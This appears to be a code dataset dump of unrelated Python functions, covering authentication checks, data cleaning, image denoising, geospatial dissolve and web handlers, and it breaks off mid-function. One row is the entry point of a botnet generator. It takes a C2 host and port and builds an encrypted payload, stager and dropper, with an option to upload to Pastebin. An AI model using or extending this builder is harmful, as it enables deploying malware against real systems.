content
stringlengths
22
815k
id
int64
0
4.91M
async def validate_login(opp, provider, args):
    """Check the supplied credentials against the auth provider and print the result."""
    try:
        provider.data.validate_login(args.username, args.password)
    except opp_auth.InvalidAuth:
        print("Auth invalid")
    else:
        print("Auth valid")
29,400
def call(stoptime, seconds, method=None):
    """
    Build a dict with route, direction, stop, call time and source.

    Call time is converted to UTC; ``deviation`` is the difference between
    the call time and the scheduled stop time.
    """
    result = dict(stoptime._asdict())
    result["call_time"] = toutc(seconds)
    # Default source flag is "I" when no method is given.
    result["source"] = method or "I"
    result["deviation"] = result["call_time"] - stoptime.datetime
    return result
29,401
def sanitize_value(val):
    """Normalize a numeric string and return it as a float.

    Strips non-breaking spaces and whitespace, converts ',' decimal
    separators to '.', interprets a '-' anywhere as a negative sign
    (a lone '-' means zero), and drops a '%' suffix.

    Note: percentages are NOT divided by 100 ('10%' -> 10.0), matching the
    original behavior.
    """
    # Drop NBSP and all whitespace, use '.' as the decimal separator.
    val = re.sub(r"[\xa0\s]", '', val)
    val = val.replace(',', '.')
    mult = 1
    if '-' in val:
        if len(val) > 1:
            mult = -1
            val = val.replace('-', '')
        else:
            # A lone '-' means zero.
            val = '0'
    # Removed the dead `if val is not None` check (re.sub never returns None)
    # and the redundant float-then-float conversion in the '%' branch.
    val = val.replace('%', '')
    return float(val) * mult
29,402
def getObjectInfo(fluiddb, about):
    """Fetch and return info for the object carrying the given about tag."""
    about_endpoint = fluiddb.about[about]
    return about_endpoint.get()
29,403
def extract_tar_images():
    """Extract every *.tar.gz archive in ``data_directory`` into ``output_dir``.

    The output directory is created on demand. Each archive is opened with a
    context manager so file handles are always released (the original left
    every TarFile open — a resource leak).
    """
    tarfiles = glob(os.path.join(data_directory, '*.tar.gz'))
    # exist_ok=True makes the former isdir() pre-check unnecessary.
    os.makedirs(output_dir, exist_ok=True)
    for archive_path in tqdm(tarfiles):
        with tarfile.open(archive_path) as tf:
            tf.extractall(path=output_dir)
29,404
def __getattr__(name):
    """Resolve module attributes, warning when a deprecated alias is used."""
    replacement = __deprecated__.get(name)
    if not replacement:
        raise AttributeError("module '{}' has no attribute '{}'".format(__name__, name))
    # replacement is (new_name, value); point callers at the new name.
    warnings.warn(
        "'{}' is deprecated. Use '{}' instead.".format(name, replacement[0]),
        category=DeprecationWarning,
        stacklevel=(3 if PY37 else 4)
    )
    return replacement[1]
29,405
def get_model_and_assets():
    """Return a tuple of (model XML string, dict of assets)."""
    model_xml = common.read_model('finger.xml')
    return model_xml, common.ASSETS
29,406
def open_random_port(limit):
    """Open ``limit`` listeners on random, currently unused ports.

    The set of occupied ports is read once from ``netstat``; each newly
    opened port is appended so the same port is never picked twice.
    """
    command = ''' netstat -plutn | grep "LISTEN" | grep -oh ":[0-9]*" | grep -v -e "^:$" | tr -d ":"'''
    ports_list = os.popen(command).read().split('\n')[:-1]
    ports_list = [int(i) for i in ports_list]
    for _ in range(limit):
        # Draw random ports until we hit one that is not already in use.
        while True:
            port = randint(0, 65535)
            if port not in ports_list:
                break
        worker = Thread(target=listen_port, args=(q, port))
        # Thread.setDaemon() is deprecated (Python 3.10+); set the attribute.
        worker.daemon = True
        worker.start()
        ports_list.append(port)
29,407
async def process_logout():
    """
    Purge the login information from the users session/cookie data.

    :return: redirect response to the landing page
    """
    # Destroy the auth cookies and send the user back to "/".
    response = RedirectResponse("/")
    for cookie_name in ("user", "flow"):
        response.delete_cookie(cookie_name)
    return response
29,408
def test_association(factory):
    """Testing Association elements in the meta-model."""
    element = factory.create(UML.Association)
    property1 = factory.create(UML.Property)
    property2 = factory.create(UML.Property)
    # Assigning to memberEnd/ownedEnd/navigableOwnedEnd should populate the
    # derived collections (member, feature, ownedMember) asserted below.
    element.memberEnd = property1
    element.memberEnd = property2
    element.ownedEnd = property1
    element.navigableOwnedEnd = property1
    assert (
        not element.isDerived
    ), f"The isDerived property should default to False - {element.isDerived}"
    assert (
        property1 in element.member
    ), f"Namespace.member does not contain memberEnd - {element.member}"
    assert (
        property2 in element.member
    ), f"Namespace.member does not contain memberEnd - {element.member}"
    assert (
        property1 in element.feature
    ), f"Classifier.feature does not contain ownedEnd - {element.feature}"
    assert (
        property1 in element.ownedMember
    ), f"Namespace.ownedMember does not contain ownedEnd - {element.ownedEnd}"
    assert (
        property1 in element.ownedEnd
    ), f"Association.ownedEnd does not contain navigableOwnedEnd - {element.ownedEnd}"
29,409
def _lex_label(label: str) -> _LexedLabel:
    """Split an absolute Bazel label into its package parts and target name."""
    match = _LABEL_LEXER.match(label)
    if match is None:
        raise ValueError(f'{label} is not an absolute Bazel label')
    groups = match.groupdict()
    packages: Optional[str] = groups['packages']
    target: Optional[str] = groups['target']
    if packages is None and target is None:
        raise ValueError(f'{label} cannot be empty')
    package_parts = packages.split('/') if packages else []
    if target:
        # Drop the leading ':' from the explicit target name.
        target_name = target[1:]
    else:
        # No explicit target: it defaults to the last package component.
        target_name = package_parts[-1]
    return package_parts, target_name
29,410
def generate_extra(candidate: tuple, expansion_set, murder_list=None, attempted=None) -> list:
    """
    Special routine for the graph-based algorithm: extend ``candidate`` by one
    constraint at a time and keep the children accepted by the check lambda.

    :param candidate: tuple of constraints to extend
    :param expansion_set: constraints that may be appended
    :param murder_list: forwarded to ``manufacture_lambda``
    :param attempted: forwarded to ``manufacture_lambda``
    :return: list of accepted, sorted candidate tuples
    """
    check = manufacture_lambda(attempted, murder_list)
    accepted = []
    for constraint in expansion_set:
        child = tuple(sorted(list(candidate) + [constraint]))
        if check(child):
            accepted.append(child)
    return accepted
29,411
def extract_oe_stereochemistry(
    molecule: Molecule, oe_mol: "OEMol"
) -> Tuple[Dict[int, AtomStereochemistry], Dict[int, BondStereochemistry]]:
    """Extracts the CIP stereochemistry of each atom and bond in a OE molecule."""
    atom_stereo = {}
    for oe_atom in oe_mol.GetAtoms():
        atom_stereo[oe_atom.GetIdx()] = atom_cip_stereochemistry(oe_mol, oe_atom)

    # Index bond stereo by the sorted endpoint pair so it can be looked up
    # from the toolkit-agnostic molecule regardless of bond direction.
    stereo_by_pair = {}
    for oe_bond in oe_mol.GetBonds():
        pair = tuple(sorted([oe_bond.GetBgnIdx(), oe_bond.GetEndIdx()]))
        stereo_by_pair[pair] = bond_cip_stereochemistry(oe_mol, oe_bond)

    bond_stereo = {
        i: stereo_by_pair[tuple(sorted([bond.atom1_index, bond.atom2_index]))]
        for i, bond in enumerate(molecule.bonds)
    }
    return atom_stereo, bond_stereo
29,412
def nlmeans_proxy(in_file, settings, snr=None, smask=None, nmask=None, out_file=None):
    """
    Uses non-local means to denoise 4D datasets.

    :param in_file: path to the input NIfTI image
    :param settings: dict of nlmeans keyword arguments; must contain 'mask'
    :param snr: fixed SNR to use for every volume; estimated per-volume if None
    :param smask: signal mask; derived from the 85th percentile of b0 if None
    :param nmask: noise mask; derived from the background if None
    :param out_file: output path; derived from in_file if None
    :return: (out_file, snr list)
    """
    from dipy.denoise.nlmeans import nlmeans
    from scipy.ndimage.morphology import binary_erosion
    from scipy import ndimage

    # Derive the output filename, keeping a possible double extension (.nii.gz).
    if out_file is None:
        fname, fext = op.splitext(op.basename(in_file))
        if fext == '.gz':
            fname, fext2 = op.splitext(fname)
            fext = fext2 + fext
        out_file = op.abspath('./%s_denoise%s' % (fname, fext))

    img = nb.load(in_file)
    hdr = img.header
    data = img.get_data()
    aff = img.affine

    # Promote 3D input to a single-volume 4D array.
    if data.ndim < 4:
        data = data[..., np.newaxis]

    data = np.nan_to_num(data)

    if data.max() < 1.0e-4:
        raise RuntimeError('There is no signal in the image')

    # Rescale low-intensity data so the max is ~1000; undone before saving.
    df = 1.0
    if data.max() < 1000.0:
        df = 1000. / data.max()
        data *= df

    # NOTE(review): assumes the first volume is the b0 — confirm with callers.
    b0 = data[..., 0]

    # Signal mask: bright voxels of b0 (85th percentile), eroded.
    if smask is None:
        smask = np.zeros_like(b0)
        smask[b0 > np.percentile(b0, 85.)] = 1

    smask = binary_erosion(
        smask.astype(np.uint8), iterations=2).astype(np.uint8)

    # Noise mask: everything outside the largest connected foreground blob.
    if nmask is None:
        nmask = np.ones_like(b0, dtype=np.uint8)
        bmask = settings['mask']
        if bmask is None:
            bmask = np.zeros_like(b0)
            bmask[b0 > np.percentile(b0[b0 > 0], 10)] = 1
            label_im, nb_labels = ndimage.label(bmask)
            sizes = ndimage.sum(bmask, label_im, range(nb_labels + 1))
            maxidx = np.argmax(sizes)
            bmask = np.zeros_like(b0, dtype=np.uint8)
            bmask[label_im == maxidx] = 1
        nmask[bmask > 0] = 0
    else:
        # Binarize a user-supplied noise mask.
        nmask = np.squeeze(nmask)
        nmask[nmask > 0.0] = 1
        nmask[nmask < 1] = 0
        nmask = nmask.astype(bool)

    nmask = binary_erosion(nmask, iterations=1).astype(np.uint8)

    den = np.zeros_like(data)

    # Use the given SNR for all volumes, or estimate per volume below.
    est_snr = True
    if snr is not None:
        snr = [snr] * data.shape[-1]
        est_snr = False
    else:
        snr = []

    for i in range(data.shape[-1]):
        d = data[..., i]
        if est_snr:
            # SNR = mean signal / std of noise for this volume.
            s = np.mean(d[smask > 0])
            n = np.std(d[nmask > 0])
            snr.append(s / n)
        den[..., i] = nlmeans(d, snr[i], **settings)

    den = np.squeeze(den)
    # Undo the intensity rescaling applied above.
    den /= df

    nb.Nifti1Image(den.astype(hdr.get_data_dtype()), aff,
                   hdr).to_filename(out_file)
    return out_file, snr
29,413
def dissolve(
        input_path: Union[str, 'os.PathLike[Any]'],
        output_path: Union[str, 'os.PathLike[Any]'],
        explodecollections: bool,
        groupby_columns: Optional[List[str]] = None,
        columns: Optional[List[str]] = [],
        aggfunc: str = 'first',
        tiles_path: Union[str, 'os.PathLike[Any]'] = None,
        nb_squarish_tiles: int = 1,
        clip_on_tiles: bool = True,
        input_layer: str = None,
        output_layer: str = None,
        nb_parallel: int = -1,
        verbose: bool = False,
        force: bool = False):
    """
    Applies a dissolve operation on the geometry column of the input file.

    Only supports (Multi)Polygon files. If the output is tiled (by specifying
    a tiles_path or nb_squarish_tiles > 1), the result will be clipped on the
    output tiles and the tile borders are never crossed.

    Remarks:
        * only aggfunc = 'first' is supported at the moment.

    Args:
        input_path (PathLike): the input file
        output_path (PathLike): the file to write the result to
        explodecollections (bool): True to output only simple geometries.
        groupby_columns (List[str], optional): columns to group on while
            aggregating. Defaults to None (spatial union of touching geometries).
        columns (List[str], optional): columns to retain in the output file.
            The groupby_columns are always retained; None retains all columns.
            Defaults to [] (= only the groupby_columns are retained).
        aggfunc (str, optional): aggregation function for non-grouped columns.
            Defaults to 'first'.
        tiles_path (PathLike, optional): geofile containing tiles to dissolve
            within. Defaults to None (= the output is not tiled).
        nb_squarish_tiles (int, optional): approximate number of tiles to
            dissolve the output to. Defaults to 1 (= the output is not tiled).
        clip_on_tiles (bool, optional): deprecated: should always be True!
        input_layer (str, optional): input layer name. Optional if the file
            only contains one layer.
        output_layer (str, optional): output layer name. Optional if the file
            only contains one layer.
        nb_parallel (int, optional): number of parallel processes; -1 uses all.
        verbose (bool, optional): write more info to the output.
        force (bool, optional): overwrite existing output file(s).
    """
    # Init: clip_on_tiles is deprecated and always treated as True.
    if clip_on_tiles is False:
        # logger.warn() is a deprecated alias; use logger.warning().
        logger.warning(
            "The clip_on_tiles parameter is deprecated! It is ignored and "
            "always treated as True. When False, a fast implementation "
            "results in some geometries not being merged or in duplicates.")
        if tiles_path is not None or nb_squarish_tiles > 1:
            raise Exception("clip_on_tiles is deprecated, and the behaviour of clip_on_tiles is False is not supported anymore.")

    tiles_path_p = None
    if tiles_path is not None:
        tiles_path_p = Path(tiles_path)

    # An empty groupby list means "no grouping": normalize it to None to
    # simplify the rest of the code.
    if groupby_columns is not None and len(groupby_columns) == 0:
        groupby_columns = None

    logger.info(f"Start dissolve on {input_path} to {output_path}")
    return geofileops_gpd.dissolve(
        input_path=Path(input_path),
        output_path=Path(output_path),
        explodecollections=explodecollections,
        groupby_columns=groupby_columns,
        columns=columns,
        aggfunc=aggfunc,
        tiles_path=tiles_path_p,
        nb_squarish_tiles=nb_squarish_tiles,
        input_layer=input_layer,
        output_layer=output_layer,
        nb_parallel=nb_parallel,
        verbose=verbose,
        force=force)
29,414
def jointImgTo3D(sample):
    """
    Normalize sample to metric 3D.

    :param sample: joints in (x,y,z) with x,y in image coordinates and z in mm
    :return: normalized joints in mm
    """
    x, y, z = sample[0], sample[1], sample[2]
    result = np.zeros((3,), np.float32)
    # Back-project pixel coordinates to metric space using the camera
    # intrinsics (center and focal length per axis).
    result[0] = (x - centerX) * z / focalLengthX
    result[1] = (y - centerY) * z / focalLengthY
    result[2] = z
    return result
29,415
def _find_registered_loggers( source_logger: Logger, loggers: Set[str], filter_func: Callable[[Set[str]], List[logging.Logger]] ) -> List[logging.Logger]: """Filter root loggers based on provided parameters.""" root_loggers = filter_func(loggers) source_logger.debug(f"Filtered root loggers: {root_loggers}") return root_loggers
29,416
def build_param_obj(key, val, delim=''):
    """Creates a Parameter object from key and value, surrounding key with delim.

    Parameters
    ----------
    key : str
        * key to use for parameter
    val : str
        * value to use for parameter
    delim : str
        * str to surround key with when adding to parameter object

    Returns
    -------
    param_obj : :class:`taniumpy.object_types.parameter.Parameter`
        * Parameter object built from key and val
    """
    param_obj = taniumpy.Parameter()
    # The key is wrapped in the delimiter on both sides, e.g. '||key||'.
    param_obj.key = f"{delim}{key}{delim}"
    param_obj.value = val
    return param_obj
29,417
def copy_fixtures_to_matrixstore(cls): """ Decorator for TestCase classes which copies data from Postgres into an in-memory MatrixStore instance. This allows us to re-use database fixtures, and the tests designed to work with those fixtures, to test MatrixStore-powered code. """ # These methods have been decorated with `@classmethod` so we need to use # `__func__` to get a reference to the original, undecorated method decorated_setUpClass = cls.setUpClass.__func__ decorated_tearDownClass = cls.tearDownClass.__func__ def setUpClass(inner_cls): decorated_setUpClass(inner_cls) matrixstore = matrixstore_from_postgres() stop_patching = patch_global_matrixstore(matrixstore) # Have to wrap this in a staticmethod decorator otherwise Python thinks # we're trying to create a new class method inner_cls._stop_patching = staticmethod(stop_patching) new_settings = override_settings( CACHES={ "default": {"BACKEND": "django.core.cache.backends.dummy.DummyCache"} } ) new_settings.enable() inner_cls._new_settings = new_settings def tearDownClass(inner_cls): inner_cls._stop_patching() inner_cls._new_settings.disable() decorated_tearDownClass(inner_cls) cls.setUpClass = classmethod(setUpClass) cls.tearDownClass = classmethod(tearDownClass) return cls
29,418
def test_ext_to_int_sample_map(
    map_mock,
):
    """
    Check ext_to_int_sample_map against a mocked API endpoint.

    :param map_mock: mock of the mapping API call; its return value is loaded
        from the LOOKUP_PED fixture file
    :return: None
    """
    with open(LOOKUP_PED, 'r', encoding='utf-8') as handle:
        payload = json.load(handle)
    map_mock.return_value = payload
    result = ext_to_int_sample_map(project=PROJECT)
    assert isinstance(result, dict)
    # External family-member IDs should map to lists of internal CPG IDs.
    assert result == {
        'FAM1_father': ['CPG11'],
        'FAM1_mother': ['CPG12'],
        'FAM1_proband': ['CPG13'],
        'FAM2_proband': ['CPG41'],
    }
29,419
def intersect_description(first, second):
    """
    Intersect two description objects.

    :param first: First object to intersect with.
    :param second: Other object to intersect with.
    :return: New object.
    """
    # A missing side means the other side wins outright.
    if first is None:
        return second
    if second is None:
        return first
    if first.description_type == second.description_type:
        # Same MIME types, can merge content
        value = let_user_choose(first.value, second.value)
        description_type = first.description_type
    else:
        # MIME types are different, set MIME type to text
        description_type = 'text/enriched'
        value = """
Original MIME-type for first description: '{0}'.
{1}
----
Original MIME-type for second description: '{2}'.
{3}
""".format(first.description_type, first.value,
           second.description_type, second.value)
    return Description(value, description_type)
29,420
def smooth_correlation_matrix(cor, sigma, exclude_diagonal=True): """Apply a simple gaussian filter on a correlation matrix. Parameters ---------- cor : numpy array Correlation matrix. sigma : int, optional Scale of the gaussian filter. exclude_diagonal : boolean, optional Whether to exclude the diagonal from the smoothing. That is what should be done generally because the diagonal is 1 by definition. Returns ------- cor_new : numpy array Smoothed correlation matrix. """ n_dim = len(np.diag(cor)) cor_new = np.copy(cor) if exclude_diagonal: cor_new[0, 0] = 0.5 * (cor[0, 1] + cor[1, 0]) cor_new[n_dim - 1, n_dim - 1] = 0.5 * (cor[n_dim - 1, n_dim - 2] + cor[n_dim - 2, n_dim - 1]) for i in range(1, n_dim - 1): cor_new[i, i] = 0.25 * (cor[i, i - 1] + cor[i, i + 1] + cor[i - 1, i] + cor[i + 1, i]) cor_new = gaussian_filter(cor_new, sigma, mode='nearest') if exclude_diagonal: for i in range(n_dim): cor_new[i, i] = cor[i, i] return cor_new
29,421
def quantize_iir_filter(filter_dict, n_bits):
    """Quantize an IIR filter dictionary for sos_filt functions.

    Parameters:
    - filter_dict: dict with keys:
        - coeff: np.array(size=(M, 6)), float coefficients
        - coeff_scale: np.array(size=(M, 2)), coefficient scales
        - coeff_shift: np.array(size=(M, 2), dtype=int), computation shifts
        - y_scale: float, output scale (unused here)
        - y_shift: int, number of bits to shift the output
    - n_bits: int, number of bits to represent the filter coefficients

    Returns tuple:
    - a: np.array(size=(M+1, 3), dtype=int), quantized nominators
    - a_shift: np.array(size=(M+1,), dtype=int), shifts for a
    - b: np.array(size=(M+1, 3), dtype=int), quantized denumerators
    - b_shift: np.array(size=(M+1,), dtype=int), shifts for b
    - y_shift: int, amount to shift the output
    """
    coeff = filter_dict["coeff"]
    coeff_scale = filter_dict["coeff_scale"]
    coeff_shift = filter_dict["coeff_shift"]
    y_shift = filter_dict["y_shift"]

    num_sections = coeff.shape[0]
    assert coeff.shape == (num_sections, 6)
    assert coeff_scale.shape == (num_sections, 2)
    assert coeff_shift.shape == (num_sections, 2)
    assert coeff_shift.dtype == int
    assert np.all(coeff_shift <= 0)

    # Row 0 is the identity section: coefficient 1.0 in fixed point.
    unit = 1 << (n_bits - 1)
    a = np.full((num_sections + 1, 3), unit, dtype=int)
    b = np.full((num_sections + 1, 3), unit, dtype=int)
    a_shift = np.full((num_sections + 1,), n_bits - 1, dtype=int)
    b_shift = np.full((num_sections + 1,), n_bits - 1, dtype=int)

    for m in range(num_sections):
        # Columns 3:6 are the denominator (a); columns 0:3 the numerator (b).
        a[m + 1, :] = quantize_to_int(coeff[m, 3:], coeff_scale[m, 1], n_bits)
        b[m + 1, :] = quantize_to_int(coeff[m, :3], coeff_scale[m, 0], n_bits)
        a_shift[m + 1] = -coeff_shift[m, 1]
        b_shift[m + 1] = -coeff_shift[m, 0]

    return a, a_shift, b, b_shift, y_shift
29,422
def add_goods(request, openid, store_id, store_name, dsr, specification, brand,
              favorable_rate, pic_path, live_recording_screen_path, daily_price,
              commission_rate, pos_price, preferential_way, goods_url, hand_card,
              storage_condition, shelf_life, unsuitable_people, ability_to_deliver,
              shipping_cycle, shipping_addresses, delivery_company, not_shipping):
    """Add a product for a store (POST).

    Ensures the store exists (creating it from store_id/store_name/dsr when
    missing), then inserts the goods record parsed from the JSON request body.

    :param request: HTTP request whose body is the JSON goods payload
    :param openid: id of the requesting user
    :param store_id: store id (max 45 chars)
    :param store_name: store name (max 45 chars)
    :param dsr: store rating
    (Remaining parameters describe the goods record; they are carried in the
    request body and are listed here for API documentation purposes only.)
    :return: dict with 'code'/'data'/'msg':
        failure   -> {'code': ResponsCode.FAILED, 'data': '', 'msg': '添加商品失败'}
        success   -> {'code': ResponsCode.SUCCESS, 'data': {'goods_id': pk}, 'msg': '添加商品成功'}
        exception -> {'code': ResponsCode.EXCEPTION, 'data': '', 'msg': '添加商品异常'}
    """
    rsp = {'code': ResponsCode.FAILED, 'data': '', "msg": '添加商品失败'}
    try:
        _, data = get_store_data_by_store_id(openid, store_id)
        if not data:
            # Store unknown: create it on the fly; failure is a client error.
            is_success = insert_store_info(store_id, store_name, dsr, openid, ignore=True)
            if not is_success:
                raise InvalidParameter('店铺不存在,且新建失败')
        is_success, pk = insert_goods_data(openid, json.loads(request.body))
        if is_success:
            rsp = {'code': ResponsCode.SUCCESS, 'data': {"goods_id": pk}, "msg": '添加商品成功'}
    except InvalidParameter as e:
        rsp = {'code': ResponsCode.FAILED, 'data': '', "msg": str(e)}
    except Exception:
        # Was a bare `except:` combined with `return` inside `finally`, which
        # swallowed every exception including SystemExit/KeyboardInterrupt.
        # logger.exception already records the traceback.
        logger.exception('add_goods failed')
        rsp = {'code': ResponsCode.EXCEPTION, 'data': '', "msg": '添加商品异常'}
    return rsp
29,423
def cli_to_args():
    """Parse the command line interface into an argparse namespace.

    Returns:
        argparse.Namespace with ``input_dir`` and ``output_dir`` attributes.
    """
    cli = argparse.ArgumentParser(description="")
    cli.add_argument('-input_dir', type=str, required=True,
                     help='The input directory that contains pngs and svgs of cowboys with Unicode names')
    cli.add_argument('-output_dir', type=str, required=True,
                     # typo fix: "diectory" -> "directory"
                     help='The output directory where we will put pngs and svgs of cowboys with plain english names. Yee haw.')
    return cli.parse_args()
29,424
def main():
    """ Run the generator """
    # Print the banner in a randomly chosen non-black colorama foreground color.
    util.display(globals()['__banner'],
                 color=random.choice(list(filter(lambda x: bool(str.isupper(x) and 'BLACK' not in x), dir(colorama.Fore)))),
                 style='normal')
    parser = argparse.ArgumentParser(
        prog='client.py',
        description="Generator (Build Your Own Botnet)"
    )
    parser.add_argument('host', action='store', type=str, help='server IP address')
    parser.add_argument('port', action='store', type=str, help='server port number')
    parser.add_argument('modules', metavar='module', action='append', nargs='*', help='module(s) to remotely import at run-time')
    parser.add_argument('--name', action='store', help='output file name')
    parser.add_argument('--icon', action='store', help='icon image file name')
    parser.add_argument('--pastebin', action='store', metavar='API', help='upload the payload to Pastebin (instead of the C2 server hosting it)')
    parser.add_argument('--encrypt', action='store_true', help='encrypt the payload with a random 128-bit key embedded in the payload\'s stager', default=False)
    parser.add_argument('--compress', action='store_true', help='zip-compress into a self-extracting python script', default=False)
    parser.add_argument('--freeze', action='store_true', help='compile client into a standalone executable for the current host platform', default=False)
    parser.add_argument('--debug', action='store_true', help='enable debugging output for frozen executables', default=False)
    parser.add_argument('-v', '--version', action='version', version='0.5',)
    options = parser.parse_args()
    # Random session key (base64 of 16 random bytes) and obfuscated variable
    # prefix used by the builder helpers below.
    key = base64.b64encode(os.urandom(16))
    var = generators.variable(3)
    # Build pipeline: modules -> imports -> hidden imports -> payload ->
    # stager -> dropper; each step feeds the next.
    modules = _modules(options, var=var, key=key)
    imports = _imports(options, var=var, key=key, modules=modules)
    hidden = _hidden(options, var=var, key=key, modules=modules, imports=imports)
    payload = _payload(options, var=var, key=key, modules=modules, imports=imports, hidden=hidden)
    stager = _stager(options, var=var, key=key, modules=modules, imports=imports, hidden=hidden, url=payload)
    dropper = _dropper(options, var=var, key=key, modules=modules, imports=imports, hidden=hidden, url=stager)
    return dropper
29,425
def _get_metadata_from_configuration(
    path, name, config,
    fields, **kwargs
):
    """Recursively get metadata from configuration.

    Args:
        path: used to indicate the path to the root element,
            mainly for trouble shooting.
        name: the key of the metadata section.
        config: the value of the metadata section.
        fields: all fields defined in os fields or package fields dir.

    Raises:
        exception.InvalidParameter: when config is not a dict, a key
            extension is malformed, or more than one general ($-prefixed)
            key is found at the same level.
    """
    if not isinstance(config, dict):
        raise exception.InvalidParameter(
            '%s config %s is not dict' % (path, config)
        )
    metadata_self = config.get('_self', {})
    if 'field' in metadata_self:
        field_name = metadata_self['field']
        field = fields[field_name]
    else:
        field = {}
    # mapping_to may contain $ like $partition. Here we replace the
    # $partition with the key of the corresponding config. The backend then
    # can use this kind of feature to support multi partitions when we
    # only declare the partition metadata in one place.
    mapping_to_template = metadata_self.get('mapping_to', None)
    if mapping_to_template:
        mapping_to = string.Template(
            mapping_to_template
        ).safe_substitute(**kwargs)
    else:
        mapping_to = None
    # Metadata values fall back from the section itself to its field.
    self_metadata = {
        'name': name,
        'display_name': metadata_self.get('display_name', name),
        'field_type': field.get('field_type', dict),
        'display_type': field.get('display_type', None),
        'description': metadata_self.get(
            'description', field.get('description', None)
        ),
        'is_required': metadata_self.get('is_required', False),
        'required_in_whole_config': metadata_self.get(
            'required_in_whole_config', False),
        'mapping_to': mapping_to,
        'validator': metadata_self.get(
            'validator', field.get('validator', None)
        ),
        'js_validator': metadata_self.get(
            'js_validator', field.get('js_validator', None)
        ),
        'default_value': metadata_self.get('default_value', None),
        'default_callback': metadata_self.get('default_callback', None),
        'default_callback_params': metadata_self.get(
            'default_callback_params', {}),
        'options': metadata_self.get('options', None),
        'options_callback': metadata_self.get('options_callback', None),
        'options_callback_params': metadata_self.get(
            'options_callback_params', {}),
        'autofill_callback': metadata_self.get(
            'autofill_callback', None),
        'autofill_callback_params': metadata_self.get(
            'autofill_callback_params', {}),
        'required_in_options': metadata_self.get(
            'required_in_options', False)
    }
    self_metadata.update(kwargs)
    metadata = {'_self': self_metadata}
    # Key extension used to do two things:
    # one is to return the extended metadata where $<something>
    # is replaced by its possible extensions.
    # The other is to record the $<something> to extended value
    # and use it in future mapping_to substitution.
    # Suppose key_extension is {'$partition': ['/var', '/']}: the metadata
    # for $partition will be mapped to {'/var': ..., '/': ...} and
    # kwargs={'partition': '/var'} / kwargs={'partition': '/'} will be
    # passed to the recursive metadata parsing for '/var' and '/', where
    # they are used to substitute mapping_to.
    key_extensions = metadata_self.get('key_extensions', {})
    general_keys = []
    for key, value in config.items():
        if key.startswith('_'):
            continue
        if key in key_extensions:
            if not key.startswith('$'):
                raise exception.InvalidParameter(
                    '%s subkey %s should start with $' % (
                        path, key
                    )
                )
            extended_keys = key_extensions[key]
            for extended_key in extended_keys:
                if extended_key.startswith('$'):
                    raise exception.InvalidParameter(
                        '%s extended key %s should not start with $' % (
                            path, extended_key
                        )
                    )
                sub_kwargs = dict(kwargs)
                sub_kwargs[key[1:]] = extended_key
                metadata[extended_key] = _get_metadata_from_configuration(
                    '%s/%s' % (path, extended_key), extended_key, value,
                    fields, **sub_kwargs
                )
        else:
            if key.startswith('$'):
                general_keys.append(key)
            metadata[key] = _get_metadata_from_configuration(
                '%s/%s' % (path, key), key, value,
                fields, **kwargs
            )
    if len(general_keys) > 1:
        # typo fix in the error message: "foud" -> "found"
        raise exception.InvalidParameter(
            'found multi general keys in %s: %s' % (
                path, general_keys
            )
        )
    return metadata
29,426
def test_get_events(lora): """Test _get_events.""" # Successful command lora._serial.receive.return_value = [ 'at+recv=0,-68,7,0', 'at+recv=1,-65,6,2:4865', ] events = lora._get_events() assert events.pop() == '1,-65,6,2:4865' assert events.pop() == '0,-68,7,0'
29,427
def calcOneFeatureEa(dataSet: list, feature_idx: int):
    """
    Compute the E(A) value (expected information) for one feature.

    :param dataSet: the data set
    :param feature_idx: index (0, 1, 2, ...) of the feature to evaluate
    :return: E(A), the attribute-weighted expected information
    """
    attrs = getOneFeatureAttrs(dataSet, feature_idx)
    # Positive/negative counts over the whole data set.
    p, n = getDatasetPN(dataSet)
    ea = 0.0
    for attr in attrs:
        # Positive/negative counts for this attribute value.
        attrP, attrN = getOneFeatureAttrPN(dataSet, feature_idx, attr)
        # I(p, n) for the subset selected by this attribute value.
        attrIPN = calcIpn(attrP, attrN)
        # Weight by the fraction of samples taking this attribute value.
        ea += (attrP+attrN)/(p+n) * attrIPN
    return ea
29,428
def translate_mapping(mapping: list, reference: SimpleNamespace, templ: bool=True, nontempl: bool=True, correctframe: bool=True, filterframe: bool=True, filternonsense: bool=True): """ creates a protein mapping from a dna mapping. :param mapping: a list/tuple of ops. :param reference: the reference object to which the mapping is relative. :param templ: include templated ops :param nontempl: include nontemplated ops :param correctframe: removes isolated ops that disrupt the frame :param filterframe: don't return a mapping if there are remaining frameshifts. :param filternonsense: don't return a mapping if contains a stop codon :return: """ # create a mapping with the appropriate SNPs base_mapping = [] if templ: base_mapping.extend(templated(mapping, reference)) if nontempl: base_mapping.extend(nontemplated(mapping, reference)) base_mapping.sort(key=lambda x: x[0]) # correct errors if correctframe: base_mapping = error_scrub(base_mapping) # filter for whether it is in frame or not. if filterframe and not len(transform(reference.seq, base_mapping)) % 3 == len(reference.seq) % 3: return [] protein = translate(transform(reference.seq, base_mapping), offset=reference.offset) if filternonsense and "_" in protein: return [] protein_alns = align_proteins(reference.protein, protein) return protein_alns
29,429
def try_download_file():
    """
    Download the required files from GitHub (pcm-dpc/COVID-19).

    On a connection error (e.g. lost connection) a notice is printed and the
    downloads are retried every 5 seconds until both succeed.
    """
    while True:
        try:
            download_file(
                "https://raw.githubusercontent.com/pcm-dpc/COVID-19/master/dati-json/dpc-covid19-ita"
                "-andamento-nazionale.json",
                "national.json", "data")
            download_file(
                "https://raw.githubusercontent.com/pcm-dpc/COVID-19/master/dati-json/dpc-covid19-ita-regioni"
                ".json",
                "regional.json", "data")
            break
        except urllib.error.URLError:
            print("[i] No connection with Host... retry in 5 seconds")
            time.sleep(5)
29,430
def trainModel(label, bestModel, obs, trainSet, testSet, modelgrid, cv, optMetric='auc'):
    """Train a message classification model.

    Tunes ``bestModel.model`` over every parameter combination in
    ``modelgrid`` using the ``cv`` folds, keeps the best setting via
    ``bestModel.updateModel``, then refits the winner on all training data.

    :param label: key used for the returned prediction dict
    :param bestModel: wrapper holding the current best model and its state
    :param obs: observed target values
    :param trainSet: training features (DataFrame)
    :param testSet: test features
    :param modelgrid: dict of parameter name -> list of candidate values
    :param cv: iterable of (train_indices, validation_indices) folds
    :param optMetric: metric optimized by ``bestModel.updateModel``
    :return: {label: {'pred': out-of-fold predictions, 'test_pred': test predictions}}
    """
    from copy import copy
    from numpy import zeros, unique
    from itertools import product

    pred = zeros(len(obs))
    fullpred = zeros((len(obs), len(unique(obs))))
    model = copy(bestModel.model)
    # Grid search: evaluate every parameter combination with CV.
    for tune in [dict(zip(modelgrid, v)) for v in product(*modelgrid.values())]:
        for k in tune:
            setattr(model, k, tune[k])
        for tr, vl in cv:
